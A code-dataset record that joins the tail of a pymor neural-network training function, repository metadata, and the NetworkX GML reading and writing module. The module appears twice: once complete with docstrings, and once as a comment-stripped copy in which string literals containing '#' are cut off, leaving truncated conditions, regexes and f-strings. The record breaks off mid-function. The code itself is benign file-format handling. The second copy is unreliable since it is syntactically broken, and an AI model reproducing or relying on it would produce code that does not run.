return es_scheduler.best_neural_network, es_scheduler.best_losses
return es_scheduler.best_neural_network, es_scheduler.best_losses
def multiple_restarts_training(training_data, validation_data, neural_network,
target_loss=None, max_restarts=10, log_loss_frequency=0,
training_parameters={}, scaling_parameters={}, seed=None):
assert isinstance(training_parameters, dict)
assert isinstance(max_restarts, int) and max_restarts > 0
logger = getLogger('pymor.algorithms.neural_network.multiple_restarts_training')
if seed:
torch.manual_seed(seed)
if len(training_data) == 0 or len(training_data[0]) == 0:
for layers in neural_network.children():
for layer in layers:
torch.nn.init.zeros_(layer.weight)
layer.bias.data.fill_(0.)
return neural_network, {'full': None, 'train': None, 'val': None}
if target_loss:
logger.info(f'Performing up to {max_restarts} restart{"s" if max_restarts > 1 else ""} '
f'to train a neural network with a loss below {target_loss:.3e} ...')
else:
logger.info(f'Performing up to {max_restarts} restart{"s" if max_restarts > 1 else ""} '
'to find the neural network with the lowest loss ...')
with logger.block('Training neural network #0 ...'):
best_neural_network, losses = train_neural_network(training_data, validation_data,
neural_network, training_parameters,
scaling_parameters, log_loss_frequency)
for run in range(1, max_restarts + 1):
if target_loss and losses['full'] <= target_loss:
logger.info(f'Finished training after {run - 1} restart{"s" if run - 1 != 1 else ""}, '
f'found neural network with loss of {losses["full"]:.3e} ...')
return neural_network, losses
with logger.block(f'Training neural network #{run} ...'):
for layers in neural_network.children():
for layer in layers:
if hasattr(layer, 'reset_parameters'):
layer.reset_parameters()
current_nn, current_losses = train_neural_network(training_data, validation_data,
neural_network, training_parameters,
scaling_parameters, log_loss_frequency)
if current_losses['full'] < losses['full']:
logger.info(f'Found better neural network (loss of {current_losses["full"]:.3e} '
f'instead of {losses["full"]:.3e}) ...')
best_neural_network = current_nn
losses = current_losses
else:
logger.info(f'Rejecting neural network with loss of {current_losses["full"]:.3e} '
f'(instead of {losses["full"]:.3e}) ...')
if target_loss:
raise NeuralNetworkTrainingFailed(f'Could not find neural network with prescribed loss of '
f'{target_loss:.3e} (best one found was {losses["full"]:.3e})!')
logger.info(f'Found neural network with error of {losses["full"]:.3e} ...')
return best_neural_network, losses
| true
| true
|
1c3eab124bcb39e762371cb7056763fe10435167
| 28,138
|
py
|
Python
|
networkx/readwrite/gml.py
|
nik0sc/networkx
|
3d5f577f5176950473367c89fc4e2fac5fb49ce7
|
[
"BSD-3-Clause"
] | null | null | null |
networkx/readwrite/gml.py
|
nik0sc/networkx
|
3d5f577f5176950473367c89fc4e2fac5fb49ce7
|
[
"BSD-3-Clause"
] | null | null | null |
networkx/readwrite/gml.py
|
nik0sc/networkx
|
3d5f577f5176950473367c89fc4e2fac5fb49ce7
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Read graphs in GML format.
"GML, the Graph Modelling Language, is our proposal for a portable
file format for graphs. GML's key features are portability, simple
syntax, extensibility and flexibility. A GML file consists of a
hierarchical key-value lists. Graphs can be annotated with arbitrary
data structures. The idea for a common file format was born at the
GD'95; this proposal is the outcome of many discussions. GML is the
standard file format in the Graphlet graph editor system. It has been
overtaken and adapted by several other systems for drawing graphs."
GML files are stored using a 7-bit ASCII encoding with any extended
ASCII characters (iso8859-1) appearing as HTML character entities.
You will need to give some thought into how the exported data should
interact with different languages and even different Python versions.
Re-importing from gml is also a concern.
Without specifying a `stringizer`/`destringizer`, the code is capable of
handling `int`/`float`/`str`/`dict`/`list` data as required by the GML
specification. For other data types, you need to explicitly supply a
`stringizer`/`destringizer`.
For additional documentation on the GML file format, please see the
`GML website <http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html>`_.
Several example graphs in GML format may be found on Mark Newman's
`Network data page <http://www-personal.umich.edu/~mejn/netdata/>`_.
"""
from io import StringIO
from ast import literal_eval
from collections import defaultdict
from enum import Enum
from typing import Any, NamedTuple
import networkx as nx
from networkx.exception import NetworkXError
from networkx.utils import open_file
import warnings
import re
import html.entities as htmlentitydefs
__all__ = ["read_gml", "parse_gml", "generate_gml", "write_gml"]
def escape(text):
"""Use XML character references to escape characters.
Use XML character references for unprintable or non-ASCII
characters, double quotes and ampersands in a string
"""
def fixup(m):
ch = m.group(0)
return "&#" + str(ord(ch)) + ";"
text = re.sub('[^ -~]|[&"]', fixup, text)
return text if isinstance(text, str) else str(text)
def unescape(text):
"""Replace XML character references with the referenced characters"""
def fixup(m):
text = m.group(0)
if text[1] == "#":
# Character reference
if text[2] == "x":
code = int(text[3:-1], 16)
else:
code = int(text[2:-1])
else:
# Named entity
try:
code = htmlentitydefs.name2codepoint[text[1:-1]]
except KeyError:
return text # leave unchanged
try:
return chr(code)
except (ValueError, OverflowError):
return text # leave unchanged
return re.sub("&(?:[0-9A-Za-z]+|#(?:[0-9]+|x[0-9A-Fa-f]+));", fixup, text)
def literal_destringizer(rep):
"""Convert a Python literal to the value it represents.
Parameters
----------
rep : string
A Python literal.
Returns
-------
value : object
The value of the Python literal.
Raises
------
ValueError
If `rep` is not a Python literal.
"""
msg = "literal_destringizer is deprecated and will be removed in 3.0."
warnings.warn(msg, DeprecationWarning)
if isinstance(rep, str):
orig_rep = rep
try:
return literal_eval(rep)
except SyntaxError as e:
raise ValueError(f"{orig_rep!r} is not a valid Python literal") from e
else:
raise ValueError(f"{rep!r} is not a string")
@open_file(0, mode="rb")
def read_gml(path, label="label", destringizer=None):
"""Read graph in GML format from `path`.
Parameters
----------
path : filename or filehandle
The filename or filehandle to read from.
label : string, optional
If not None, the parsed nodes will be renamed according to node
attributes indicated by `label`. Default value: 'label'.
destringizer : callable, optional
A `destringizer` that recovers values stored as strings in GML. If it
cannot convert a string to a value, a `ValueError` is raised. Default
value : None.
Returns
-------
G : NetworkX graph
The parsed graph.
Raises
------
NetworkXError
If the input cannot be parsed.
See Also
--------
write_gml, parse_gml
Notes
-----
GML files are stored using a 7-bit ASCII encoding with any extended
ASCII characters (iso8859-1) appearing as HTML character entities.
Without specifying a `stringizer`/`destringizer`, the code is capable of
handling `int`/`float`/`str`/`dict`/`list` data as required by the GML
specification. For other data types, you need to explicitly supply a
`stringizer`/`destringizer`.
For additional documentation on the GML file format, please see the
`GML url <http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html>`_.
See the module docstring :mod:`networkx.readwrite.gml` for more details.
Examples
--------
>>> G = nx.path_graph(4)
>>> nx.write_gml(G, 'test.gml')
>>> H = nx.read_gml('test.gml')
"""
def filter_lines(lines):
for line in lines:
try:
line = line.decode("ascii")
except UnicodeDecodeError as e:
raise NetworkXError("input is not ASCII-encoded") from e
if not isinstance(line, str):
lines = str(lines)
if line and line[-1] == "\n":
line = line[:-1]
yield line
G = parse_gml_lines(filter_lines(path), label, destringizer)
return G
def parse_gml(lines, label="label", destringizer=None):
"""Parse GML graph from a string or iterable.
Parameters
----------
lines : string or iterable of strings
Data in GML format.
label : string, optional
If not None, the parsed nodes will be renamed according to node
attributes indicated by `label`. Default value: 'label'.
destringizer : callable, optional
A `destringizer` that recovers values stored as strings in GML. If it
cannot convert a string to a value, a `ValueError` is raised. Default
value : None.
Returns
-------
G : NetworkX graph
The parsed graph.
Raises
------
NetworkXError
If the input cannot be parsed.
See Also
--------
write_gml, read_gml
Notes
-----
This stores nested GML attributes as dictionaries in the NetworkX graph,
node, and edge attribute structures.
GML files are stored using a 7-bit ASCII encoding with any extended
ASCII characters (iso8859-1) appearing as HTML character entities.
Without specifying a `stringizer`/`destringizer`, the code is capable of
handling `int`/`float`/`str`/`dict`/`list` data as required by the GML
specification. For other data types, you need to explicitly supply a
`stringizer`/`destringizer`.
For additional documentation on the GML file format, please see the
`GML url <http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html>`_.
See the module docstring :mod:`networkx.readwrite.gml` for more details.
"""
def decode_line(line):
if isinstance(line, bytes):
try:
line.decode("ascii")
except UnicodeDecodeError as e:
raise NetworkXError("input is not ASCII-encoded") from e
if not isinstance(line, str):
line = str(line)
return line
def filter_lines(lines):
if isinstance(lines, str):
lines = decode_line(lines)
lines = lines.splitlines()
yield from lines
else:
for line in lines:
line = decode_line(line)
if line and line[-1] == "\n":
line = line[:-1]
if line.find("\n") != -1:
raise NetworkXError("input line contains newline")
yield line
G = parse_gml_lines(filter_lines(lines), label, destringizer)
return G
class Pattern(Enum):
""" encodes the index of each token-matching pattern in `tokenize`. """
KEYS = 0
REALS = 1
INTS = 2
STRINGS = 3
DICT_START = 4
DICT_END = 5
COMMENT_WHITESPACE = 6
class Token(NamedTuple):
category: Pattern
value: Any
line: int
position: int
LIST_START_VALUE = "_networkx_list_start"
def parse_gml_lines(lines, label, destringizer):
"""Parse GML `lines` into a graph.
"""
def tokenize():
patterns = [
r"[A-Za-z][0-9A-Za-z_]*\b", # keys
# reals
r"[+-]?(?:[0-9]*\.[0-9]+|[0-9]+\.[0-9]*)(?:[Ee][+-]?[0-9]+)?",
r"[+-]?[0-9]+", # ints
r'".*?"', # strings
r"\[", # dict start
r"\]", # dict end
r"#.*$|\s+", # comments and whitespaces
]
tokens = re.compile("|".join(f"({pattern})" for pattern in patterns))
lineno = 0
for line in lines:
length = len(line)
pos = 0
while pos < length:
match = tokens.match(line, pos)
if match is None:
m = f"cannot tokenize {line[pos:]} at ({lineno + 1}, {pos + 1})"
raise NetworkXError(m)
for i in range(len(patterns)):
group = match.group(i + 1)
if group is not None:
if i == 0: # keys
value = group.rstrip()
elif i == 1: # reals
value = float(group)
elif i == 2: # ints
value = int(group)
else:
value = group
if i != 6: # comments and whitespaces
yield Token(Pattern(i), value, lineno + 1, pos + 1)
pos += len(group)
break
lineno += 1
yield Token(None, None, lineno + 1, 1) # EOF
def unexpected(curr_token, expected):
category, value, lineno, pos = curr_token
value = repr(value) if value is not None else "EOF"
raise NetworkXError(f"expected {expected}, found {value} at ({lineno}, {pos})")
def consume(curr_token, category, expected):
if curr_token.category == category:
return next(tokens)
unexpected(curr_token, expected)
def parse_kv(curr_token):
dct = defaultdict(list)
while curr_token.category == Pattern.KEYS:
key = curr_token.value
curr_token = next(tokens)
category = curr_token.category
if category == Pattern.REALS or category == Pattern.INTS:
value = curr_token.value
curr_token = next(tokens)
elif category == Pattern.STRINGS:
value = unescape(curr_token.value[1:-1])
if destringizer:
try:
value = destringizer(value)
except ValueError:
pass
curr_token = next(tokens)
elif category == Pattern.DICT_START:
curr_token, value = parse_dict(curr_token)
else:
# Allow for string convertible id and label values
if key in ("id", "label", "source", "target"):
try:
# String convert the token value
value = unescape(str(curr_token.value))
if destringizer:
try:
value = destringizer(value)
except ValueError:
pass
curr_token = next(tokens)
except Exception:
msg = (
"an int, float, string, '[' or string"
+ " convertable ASCII value for node id or label"
)
unexpected(curr_token, msg)
else: # Otherwise error out
unexpected(curr_token, "an int, float, string or '['")
dct[key].append(value)
def clean_dict_value(value):
if not isinstance(value, list):
return value
if len(value) == 1:
return value[0]
if value[0] == LIST_START_VALUE:
return value[1:]
return value
dct = {key: clean_dict_value(value) for key, value in dct.items()}
return curr_token, dct
def parse_dict(curr_token):
# dict start
curr_token = consume(curr_token, Pattern.DICT_START, "'['")
# dict contents
curr_token, dct = parse_kv(curr_token)
# dict end
curr_token = consume(curr_token, Pattern.DICT_END, "']'")
return curr_token, dct
def parse_graph():
curr_token, dct = parse_kv(next(tokens))
if curr_token.category is not None: # EOF
unexpected(curr_token, "EOF")
if "graph" not in dct:
raise NetworkXError("input contains no graph")
graph = dct["graph"]
if isinstance(graph, list):
raise NetworkXError("input contains more than one graph")
return graph
tokens = tokenize()
graph = parse_graph()
directed = graph.pop("directed", False)
multigraph = graph.pop("multigraph", False)
if not multigraph:
G = nx.DiGraph() if directed else nx.Graph()
else:
G = nx.MultiDiGraph() if directed else nx.MultiGraph()
graph_attr = {k: v for k, v in graph.items() if k not in ("node", "edge")}
G.graph.update(graph_attr)
def pop_attr(dct, category, attr, i):
try:
return dct.pop(attr)
except KeyError as e:
raise NetworkXError(f"{category} #{i} has no '{attr}' attribute") from e
nodes = graph.get("node", [])
mapping = {}
node_labels = set()
for i, node in enumerate(nodes if isinstance(nodes, list) else [nodes]):
id = pop_attr(node, "node", "id", i)
if id in G:
raise NetworkXError(f"node id {id!r} is duplicated")
if label is not None and label != "id":
node_label = pop_attr(node, "node", label, i)
if node_label in node_labels:
raise NetworkXError(f"node label {node_label!r} is duplicated")
node_labels.add(node_label)
mapping[id] = node_label
G.add_node(id, **node)
edges = graph.get("edge", [])
for i, edge in enumerate(edges if isinstance(edges, list) else [edges]):
source = pop_attr(edge, "edge", "source", i)
target = pop_attr(edge, "edge", "target", i)
if source not in G:
raise NetworkXError(f"edge #{i} has undefined source {source!r}")
if target not in G:
raise NetworkXError(f"edge #{i} has undefined target {target!r}")
if not multigraph:
if not G.has_edge(source, target):
G.add_edge(source, target, **edge)
else:
arrow = "->" if directed else "--"
msg = f"edge #{i} ({source!r}{arrow}{target!r}) is duplicated"
raise nx.NetworkXError(msg)
else:
key = edge.pop("key", None)
if key is not None and G.has_edge(source, target, key):
arrow = "->" if directed else "--"
msg = f"edge #{i} ({source!r}{arrow}{target!r}, {key!r})"
msg2 = 'Hint: If multigraph add "multigraph 1" to file header.'
raise nx.NetworkXError(msg + " is duplicated\n" + msg2)
G.add_edge(source, target, key, **edge)
if label is not None and label != "id":
G = nx.relabel_nodes(G, mapping)
return G
def literal_stringizer(value):
"""Convert a `value` to a Python literal in GML representation.
Parameters
----------
value : object
The `value` to be converted to GML representation.
Returns
-------
rep : string
A double-quoted Python literal representing value. Unprintable
characters are replaced by XML character references.
Raises
------
ValueError
If `value` cannot be converted to GML.
Notes
-----
`literal_stringizer` is largely the same as `repr` in terms of
functionality but attempts prefix `unicode` and `bytes` literals with
`u` and `b` to provide better interoperability of data generated by
Python 2 and Python 3.
The original value can be recovered using the
:func:`networkx.readwrite.gml.literal_destringizer` function.
"""
msg = "literal_stringizer is deprecated and will be removed in 3.0."
warnings.warn(msg, DeprecationWarning)
def stringize(value):
if isinstance(value, (int, bool)) or value is None:
if value is True: # GML uses 1/0 for boolean values.
buf.write(str(1))
elif value is False:
buf.write(str(0))
else:
buf.write(str(value))
elif isinstance(value, str):
text = repr(value)
if text[0] != "u":
try:
value.encode("latin1")
except UnicodeEncodeError:
text = "u" + text
buf.write(text)
elif isinstance(value, (float, complex, str, bytes)):
buf.write(repr(value))
elif isinstance(value, list):
buf.write("[")
first = True
for item in value:
if not first:
buf.write(",")
else:
first = False
stringize(item)
buf.write("]")
elif isinstance(value, tuple):
if len(value) > 1:
buf.write("(")
first = True
for item in value:
if not first:
buf.write(",")
else:
first = False
stringize(item)
buf.write(")")
elif value:
buf.write("(")
stringize(value[0])
buf.write(",)")
else:
buf.write("()")
elif isinstance(value, dict):
buf.write("{")
first = True
for key, value in value.items():
if not first:
buf.write(",")
else:
first = False
stringize(key)
buf.write(":")
stringize(value)
buf.write("}")
elif isinstance(value, set):
buf.write("{")
first = True
for item in value:
if not first:
buf.write(",")
else:
first = False
stringize(item)
buf.write("}")
else:
msg = "{value!r} cannot be converted into a Python literal"
raise ValueError(msg)
buf = StringIO()
stringize(value)
return buf.getvalue()
def generate_gml(G, stringizer=None):
r"""Generate a single entry of the graph `G` in GML format.
Parameters
----------
G : NetworkX graph
The graph to be converted to GML.
stringizer : callable, optional
A `stringizer` which converts non-int/non-float/non-dict values into
strings. If it cannot convert a value into a string, it should raise a
`ValueError` to indicate that. Default value: None.
Returns
-------
lines: generator of strings
Lines of GML data. Newlines are not appended.
Raises
------
NetworkXError
If `stringizer` cannot convert a value into a string, or the value to
convert is not a string while `stringizer` is None.
Notes
-----
Graph attributes named 'directed', 'multigraph', 'node' or
'edge', node attributes named 'id' or 'label', edge attributes
named 'source' or 'target' (or 'key' if `G` is a multigraph)
are ignored because these attribute names are used to encode the graph
structure.
GML files are stored using a 7-bit ASCII encoding with any extended
ASCII characters (iso8859-1) appearing as HTML character entities.
Without specifying a `stringizer`/`destringizer`, the code is capable of
handling `int`/`float`/`str`/`dict`/`list` data as required by the GML
specification. For other data types, you need to explicitly supply a
`stringizer`/`destringizer`.
For additional documentation on the GML file format, please see the
`GML url <http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html>`_.
See the module docstring :mod:`networkx.readwrite.gml` for more details.
Examples
--------
>>> G = nx.Graph()
>>> G.add_node("1")
>>> print("\n".join(nx.generate_gml(G)))
graph [
node [
id 0
label "1"
]
]
>>> G = nx.OrderedMultiGraph([("a", "b"), ("a", "b")])
>>> print("\n".join(nx.generate_gml(G)))
graph [
multigraph 1
node [
id 0
label "a"
]
node [
id 1
label "b"
]
edge [
source 0
target 1
key 0
]
edge [
source 0
target 1
key 1
]
]
"""
valid_keys = re.compile("^[A-Za-z][0-9A-Za-z_]*$")
def stringize(key, value, ignored_keys, indent, in_list=False):
if not isinstance(key, str):
raise NetworkXError(f"{key!r} is not a string")
if not valid_keys.match(key):
raise NetworkXError(f"{key!r} is not a valid key")
if not isinstance(key, str):
key = str(key)
if key not in ignored_keys:
if isinstance(value, (int, bool)):
if key == "label":
yield indent + key + ' "' + str(value) + '"'
elif value is True:
# python bool is an instance of int
yield indent + key + " 1"
elif value is False:
yield indent + key + " 0"
# GML only supports signed 32-bit integers
elif value < -2 ** 31 or value >= 2 ** 31:
yield indent + key + ' "' + str(value) + '"'
else:
yield indent + key + " " + str(value)
elif isinstance(value, float):
text = repr(value).upper()
# GML requires that a real literal contain a decimal point, but
# repr may not output a decimal point when the mantissa is
# integral and hence needs fixing.
epos = text.rfind("E")
if epos != -1 and text.find(".", 0, epos) == -1:
text = text[:epos] + "." + text[epos:]
if key == "label":
yield indent + key + ' "' + text + '"'
else:
yield indent + key + " " + text
elif isinstance(value, dict):
yield indent + key + " ["
next_indent = indent + " "
for key, value in value.items():
yield from stringize(key, value, (), next_indent)
yield indent + ']'
elif isinstance(value, (list, tuple)) and key != 'label' \
and value and not in_list:
if len(value) == 1:
yield indent + key + ' ' + f'"{LIST_START_VALUE}"'
for val in value:
yield from stringize(key, val, (), indent, True)
else:
if stringizer:
try:
value = stringizer(value)
except ValueError as e:
raise NetworkXError(
f"{value!r} cannot be converted into a string"
) from e
if not isinstance(value, str):
raise NetworkXError(f"{value!r} is not a string")
yield indent + key + ' "' + escape(value) + '"'
multigraph = G.is_multigraph()
yield "graph ["
# Output graph attributes
if G.is_directed():
yield " directed 1"
if multigraph:
yield " multigraph 1"
ignored_keys = {"directed", "multigraph", "node", "edge"}
for attr, value in G.graph.items():
yield from stringize(attr, value, ignored_keys, " ")
# Output node data
node_id = dict(zip(G, range(len(G))))
ignored_keys = {"id", "label"}
for node, attrs in G.nodes.items():
yield " node ["
yield " id " + str(node_id[node])
yield from stringize("label", node, (), " ")
for attr, value in attrs.items():
yield from stringize(attr, value, ignored_keys, " ")
yield " ]"
# Output edge data
ignored_keys = {"source", "target"}
kwargs = {"data": True}
if multigraph:
ignored_keys.add("key")
kwargs["keys"] = True
for e in G.edges(**kwargs):
yield " edge ["
yield " source " + str(node_id[e[0]])
yield " target " + str(node_id[e[1]])
if multigraph:
yield from stringize("key", e[2], (), " ")
for attr, value in e[-1].items():
yield from stringize(attr, value, ignored_keys, " ")
yield " ]"
yield "]"
@open_file(1, mode="wb")
def write_gml(G, path, stringizer=None):
"""Write a graph `G` in GML format to the file or file handle `path`.
Parameters
----------
G : NetworkX graph
The graph to be converted to GML.
path : filename or filehandle
The filename or filehandle to write. Files whose names end with .gz or
.bz2 will be compressed.
stringizer : callable, optional
A `stringizer` which converts non-int/non-float/non-dict values into
strings. If it cannot convert a value into a string, it should raise a
`ValueError` to indicate that. Default value: None.
Raises
------
NetworkXError
If `stringizer` cannot convert a value into a string, or the value to
convert is not a string while `stringizer` is None.
See Also
--------
read_gml, generate_gml
Notes
-----
Graph attributes named 'directed', 'multigraph', 'node' or
'edge', node attributes named 'id' or 'label', edge attributes
named 'source' or 'target' (or 'key' if `G` is a multigraph)
are ignored because these attribute names are used to encode the graph
structure.
GML files are stored using a 7-bit ASCII encoding with any extended
ASCII characters (iso8859-1) appearing as HTML character entities.
Without specifying a `stringizer`/`destringizer`, the code is capable of
handling `int`/`float`/`str`/`dict`/`list` data as required by the GML
specification. For other data types, you need to explicitly supply a
`stringizer`/`destringizer`.
Note that while we allow non-standard GML to be read from a file, we make
sure to write GML format. In particular, underscores are not allowed in
attribute names.
For additional documentation on the GML file format, please see the
`GML url <http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html>`_.
See the module docstring :mod:`networkx.readwrite.gml` for more details.
Examples
--------
>>> G = nx.path_graph(4)
>>> nx.write_gml(G, "test.gml")
Filenames ending in .gz or .bz2 will be compressed.
>>> nx.write_gml(G, "test.gml.gz")
"""
for line in generate_gml(G, stringizer):
path.write((line + "\n").encode("ascii"))
| 34.356532
| 87
| 0.55473
|
from io import StringIO
from ast import literal_eval
from collections import defaultdict
from enum import Enum
from typing import Any, NamedTuple
import networkx as nx
from networkx.exception import NetworkXError
from networkx.utils import open_file
import warnings
import re
import html.entities as htmlentitydefs
__all__ = ["read_gml", "parse_gml", "generate_gml", "write_gml"]
def escape(text):
def fixup(m):
ch = m.group(0)
return "&#" + str(ord(ch)) + ";"
text = re.sub('[^ -~]|[&"]', fixup, text)
return text if isinstance(text, str) else str(text)
def unescape(text):
def fixup(m):
text = m.group(0)
if text[1] == "
# Character reference
if text[2] == "x":
code = int(text[3:-1], 16)
else:
code = int(text[2:-1])
else:
# Named entity
try:
code = htmlentitydefs.name2codepoint[text[1:-1]]
except KeyError:
return text # leave unchanged
try:
return chr(code)
except (ValueError, OverflowError):
return text # leave unchanged
return re.sub("&(?:[0-9A-Za-z]+|
def literal_destringizer(rep):
msg = "literal_destringizer is deprecated and will be removed in 3.0."
warnings.warn(msg, DeprecationWarning)
if isinstance(rep, str):
orig_rep = rep
try:
return literal_eval(rep)
except SyntaxError as e:
raise ValueError(f"{orig_rep!r} is not a valid Python literal") from e
else:
raise ValueError(f"{rep!r} is not a string")
@open_file(0, mode="rb")
def read_gml(path, label="label", destringizer=None):
def filter_lines(lines):
for line in lines:
try:
line = line.decode("ascii")
except UnicodeDecodeError as e:
raise NetworkXError("input is not ASCII-encoded") from e
if not isinstance(line, str):
lines = str(lines)
if line and line[-1] == "\n":
line = line[:-1]
yield line
G = parse_gml_lines(filter_lines(path), label, destringizer)
return G
def parse_gml(lines, label="label", destringizer=None):
def decode_line(line):
if isinstance(line, bytes):
try:
line.decode("ascii")
except UnicodeDecodeError as e:
raise NetworkXError("input is not ASCII-encoded") from e
if not isinstance(line, str):
line = str(line)
return line
def filter_lines(lines):
if isinstance(lines, str):
lines = decode_line(lines)
lines = lines.splitlines()
yield from lines
else:
for line in lines:
line = decode_line(line)
if line and line[-1] == "\n":
line = line[:-1]
if line.find("\n") != -1:
raise NetworkXError("input line contains newline")
yield line
G = parse_gml_lines(filter_lines(lines), label, destringizer)
return G
class Pattern(Enum):
KEYS = 0
REALS = 1
INTS = 2
STRINGS = 3
DICT_START = 4
DICT_END = 5
COMMENT_WHITESPACE = 6
class Token(NamedTuple):
category: Pattern
value: Any
line: int
position: int
LIST_START_VALUE = "_networkx_list_start"
def parse_gml_lines(lines, label, destringizer):
def tokenize():
patterns = [
r"[A-Za-z][0-9A-Za-z_]*\b", # keys
# reals
r"[+-]?(?:[0-9]*\.[0-9]+|[0-9]+\.[0-9]*)(?:[Ee][+-]?[0-9]+)?",
r"[+-]?[0-9]+", # ints
r'".*?"', # strings
r"\[", # dict start
r"\]", # dict end
r"
]
tokens = re.compile("|".join(f"({pattern})" for pattern in patterns))
lineno = 0
for line in lines:
length = len(line)
pos = 0
while pos < length:
match = tokens.match(line, pos)
if match is None:
m = f"cannot tokenize {line[pos:]} at ({lineno + 1}, {pos + 1})"
raise NetworkXError(m)
for i in range(len(patterns)):
group = match.group(i + 1)
if group is not None:
if i == 0: # keys
value = group.rstrip()
elif i == 1: # reals
value = float(group)
elif i == 2: # ints
value = int(group)
else:
value = group
if i != 6: # comments and whitespaces
yield Token(Pattern(i), value, lineno + 1, pos + 1)
pos += len(group)
break
lineno += 1
yield Token(None, None, lineno + 1, 1) # EOF
def unexpected(curr_token, expected):
category, value, lineno, pos = curr_token
value = repr(value) if value is not None else "EOF"
raise NetworkXError(f"expected {expected}, found {value} at ({lineno}, {pos})")
def consume(curr_token, category, expected):
if curr_token.category == category:
return next(tokens)
unexpected(curr_token, expected)
def parse_kv(curr_token):
dct = defaultdict(list)
while curr_token.category == Pattern.KEYS:
key = curr_token.value
curr_token = next(tokens)
category = curr_token.category
if category == Pattern.REALS or category == Pattern.INTS:
value = curr_token.value
curr_token = next(tokens)
elif category == Pattern.STRINGS:
value = unescape(curr_token.value[1:-1])
if destringizer:
try:
value = destringizer(value)
except ValueError:
pass
curr_token = next(tokens)
elif category == Pattern.DICT_START:
curr_token, value = parse_dict(curr_token)
else:
# Allow for string convertible id and label values
if key in ("id", "label", "source", "target"):
try:
# String convert the token value
value = unescape(str(curr_token.value))
if destringizer:
try:
value = destringizer(value)
except ValueError:
pass
curr_token = next(tokens)
except Exception:
msg = (
"an int, float, string, '[' or string"
+ " convertable ASCII value for node id or label"
)
unexpected(curr_token, msg)
else: # Otherwise error out
unexpected(curr_token, "an int, float, string or '['")
dct[key].append(value)
def clean_dict_value(value):
if not isinstance(value, list):
return value
if len(value) == 1:
return value[0]
if value[0] == LIST_START_VALUE:
return value[1:]
return value
dct = {key: clean_dict_value(value) for key, value in dct.items()}
return curr_token, dct
def parse_dict(curr_token):
# dict start
curr_token = consume(curr_token, Pattern.DICT_START, "'['")
# dict contents
curr_token, dct = parse_kv(curr_token)
# dict end
curr_token = consume(curr_token, Pattern.DICT_END, "']'")
return curr_token, dct
def parse_graph():
curr_token, dct = parse_kv(next(tokens))
if curr_token.category is not None: # EOF
unexpected(curr_token, "EOF")
if "graph" not in dct:
raise NetworkXError("input contains no graph")
graph = dct["graph"]
if isinstance(graph, list):
raise NetworkXError("input contains more than one graph")
return graph
tokens = tokenize()
graph = parse_graph()
directed = graph.pop("directed", False)
multigraph = graph.pop("multigraph", False)
if not multigraph:
G = nx.DiGraph() if directed else nx.Graph()
else:
G = nx.MultiDiGraph() if directed else nx.MultiGraph()
graph_attr = {k: v for k, v in graph.items() if k not in ("node", "edge")}
G.graph.update(graph_attr)
def pop_attr(dct, category, attr, i):
try:
return dct.pop(attr)
except KeyError as e:
raise NetworkXError(f"{category}
nodes = graph.get("node", [])
mapping = {}
node_labels = set()
for i, node in enumerate(nodes if isinstance(nodes, list) else [nodes]):
id = pop_attr(node, "node", "id", i)
if id in G:
raise NetworkXError(f"node id {id!r} is duplicated")
if label is not None and label != "id":
node_label = pop_attr(node, "node", label, i)
if node_label in node_labels:
raise NetworkXError(f"node label {node_label!r} is duplicated")
node_labels.add(node_label)
mapping[id] = node_label
G.add_node(id, **node)
edges = graph.get("edge", [])
for i, edge in enumerate(edges if isinstance(edges, list) else [edges]):
source = pop_attr(edge, "edge", "source", i)
target = pop_attr(edge, "edge", "target", i)
if source not in G:
raise NetworkXError(f"edge
if target not in G:
raise NetworkXError(f"edge
if not multigraph:
if not G.has_edge(source, target):
G.add_edge(source, target, **edge)
else:
arrow = "->" if directed else "--"
msg = f"edge
raise nx.NetworkXError(msg)
else:
key = edge.pop("key", None)
if key is not None and G.has_edge(source, target, key):
arrow = "->" if directed else "--"
msg = f"edge
msg2 = 'Hint: If multigraph add "multigraph 1" to file header.'
raise nx.NetworkXError(msg + " is duplicated\n" + msg2)
G.add_edge(source, target, key, **edge)
if label is not None and label != "id":
G = nx.relabel_nodes(G, mapping)
return G
def literal_stringizer(value):
msg = "literal_stringizer is deprecated and will be removed in 3.0."
warnings.warn(msg, DeprecationWarning)
def stringize(value):
if isinstance(value, (int, bool)) or value is None:
if value is True: # GML uses 1/0 for boolean values.
buf.write(str(1))
elif value is False:
buf.write(str(0))
else:
buf.write(str(value))
elif isinstance(value, str):
text = repr(value)
if text[0] != "u":
try:
value.encode("latin1")
except UnicodeEncodeError:
text = "u" + text
buf.write(text)
elif isinstance(value, (float, complex, str, bytes)):
buf.write(repr(value))
elif isinstance(value, list):
buf.write("[")
first = True
for item in value:
if not first:
buf.write(",")
else:
first = False
stringize(item)
buf.write("]")
elif isinstance(value, tuple):
if len(value) > 1:
buf.write("(")
first = True
for item in value:
if not first:
buf.write(",")
else:
first = False
stringize(item)
buf.write(")")
elif value:
buf.write("(")
stringize(value[0])
buf.write(",)")
else:
buf.write("()")
elif isinstance(value, dict):
buf.write("{")
first = True
for key, value in value.items():
if not first:
buf.write(",")
else:
first = False
stringize(key)
buf.write(":")
stringize(value)
buf.write("}")
elif isinstance(value, set):
buf.write("{")
first = True
for item in value:
if not first:
buf.write(",")
else:
first = False
stringize(item)
buf.write("}")
else:
msg = "{value!r} cannot be converted into a Python literal"
raise ValueError(msg)
buf = StringIO()
stringize(value)
return buf.getvalue()
def generate_gml(G, stringizer=None):
valid_keys = re.compile("^[A-Za-z][0-9A-Za-z_]*$")
def stringize(key, value, ignored_keys, indent, in_list=False):
if not isinstance(key, str):
raise NetworkXError(f"{key!r} is not a string")
if not valid_keys.match(key):
raise NetworkXError(f"{key!r} is not a valid key")
if not isinstance(key, str):
key = str(key)
if key not in ignored_keys:
if isinstance(value, (int, bool)):
if key == "label":
yield indent + key + ' "' + str(value) + '"'
elif value is True:
# python bool is an instance of int
yield indent + key + " 1"
elif value is False:
yield indent + key + " 0"
# GML only supports signed 32-bit integers
elif value < -2 ** 31 or value >= 2 ** 31:
yield indent + key + ' "' + str(value) + '"'
else:
yield indent + key + " " + str(value)
elif isinstance(value, float):
text = repr(value).upper()
# GML requires that a real literal contain a decimal point, but
# repr may not output a decimal point when the mantissa is
# integral and hence needs fixing.
epos = text.rfind("E")
